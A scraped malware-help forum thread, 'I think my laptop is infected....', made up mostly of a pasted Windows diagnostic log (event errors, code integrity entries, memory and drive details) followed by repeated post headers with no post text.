   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/31/2018 05:08:04 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (10/31/2018 01:16:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: uninstall.exe_unknown, version: 0.0.0.0, time stamp: 0x553dfb6d
Faulting module name: uninstall.exe, version: 0.0.0.0, time stamp: 0x553dfb6d
Exception code: 0xc0000005
Fault offset: 0x0008355e
Faulting process id: 0x19ec
Faulting application start time: 0x01d47156ac9f07cf
Faulting application path: C:\Users\1108\AppData\Local\Chromium\Application\45.0.2441.0\Installer\uninstall.exe
Faulting module path: C:\Users\1108\AppData\Local\Chromium\Application\45.0.2441.0\Installer\uninstall.exe
Report Id: eb562ccd-dd49-11e8-875f-b888e30f5bb1

Error: (10/31/2018 12:40:58 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/31/2018 12:39:01 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (10/31/2018 08:51:31 AM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/31/2018 08:50:52 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (10/30/2018 06:28:25 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

System errors:
=============
Error: (10/16/2018 02:36:11 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {209500FC-6B45-4693-8871-6296C4843751} did not register with DCOM within the required timeout.

Error: (10/13/2018 08:45:17 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {209500FC-6B45-4693-8871-6296C4843751} did not register with DCOM within the required timeout.

Error: (09/28/2018 07:10:50 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Multimedia Class Scheduler service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (09/28/2018 07:10:50 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the MMCSS service.

Error: (09/28/2018 07:10:10 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {209500FC-6B45-4693-8871-6296C4843751} did not register with DCOM within the required timeout.

Error: (07/29/2018 12:45:34 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the HomeNetSvc service.

Error: (07/28/2018 02:56:57 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {209500FC-6B45-4693-8871-6296C4843751} did not register with DCOM within the required timeout.

Error: (07/28/2018 01:37:40 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {209500FC-6B45-4693-8871-6296C4843751} did not register with DCOM within the required timeout.

CodeIntegrity:
===================================

Date: 2013-12-14 08:33:03.672
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

Date: 2013-12-14 08:33:03.657
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel® Core™ i7-2670QM CPU @ 2.20GHz
Percentage of memory in use: 60%
Total physical RAM: 6050.69 MB
Available physical RAM: 2367.57 MB
Total Virtual: 12099.57 MB
Available Virtual: 8446.38 MB

==================== Drives ================================

Drive c: (TI106230W0C) (Fixed) (Total:682.07 GB) (Free:614.63 GB) NTFS ==>[system with boot components (obtained from drive)]

\\?\Volume{2d744e19-9baa-11e1-8ee8-806e6f6e6963}\ (System) (Fixed) (Total:1.46 GB) (Free:1.27 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 698.6 GB) (Disk ID: 4FE3BE95)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=682.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=15.1 GB) - (Type=17)

==================== End of Addition.txt ============================

#1
traceym54

Posted 31 October 2018 - 02:11 PM

Advertisements

#2
zep516

Posted 31 October 2018 - 03:59 PM

#3
traceym54

Posted 31 October 2018 - 06:38 PM

#4
zep516

Posted 31 October 2018 - 06:52 PM

#5
zep516

Posted 31 October 2018 - 08:08 PM

#6
traceym54

Posted 01 November 2018 - 02:37 PM

#7
zep516

Posted 01 November 2018 - 02:50 PM

Similar Topics

0 user(s) are reading this topic

As Featured On:

Forums

Downloads

Members

Connect With Us

I think my laptop is infected....

#1 traceym54 Posted 31 October 2018 - 02:11 PM

Advertisements

#2 zep516 Posted 31 October 2018 - 03:59 PM

#3 traceym54 Posted 31 October 2018 - 06:38 PM

#4 zep516 Posted 31 October 2018 - 06:52 PM

#5 zep516 Posted 31 October 2018 - 08:08 PM

#6 traceym54 Posted 01 November 2018 - 02:37 PM

#7 zep516 Posted 01 November 2018 - 02:50 PM

Similar Topics

0 user(s) are reading this topic

As Featured On:

Forums

Downloads

Members

Connect With Us

Sign In

#1
traceym54

Posted 31 October 2018 - 02:11 PM

#2
zep516

Posted 31 October 2018 - 03:59 PM

#3
traceym54

Posted 31 October 2018 - 06:38 PM

#4
zep516

Posted 31 October 2018 - 06:52 PM

#5
zep516

Posted 31 October 2018 - 08:08 PM

#6
traceym54

Posted 01 November 2018 - 02:37 PM

#7
zep516

Posted 01 November 2018 - 02:50 PM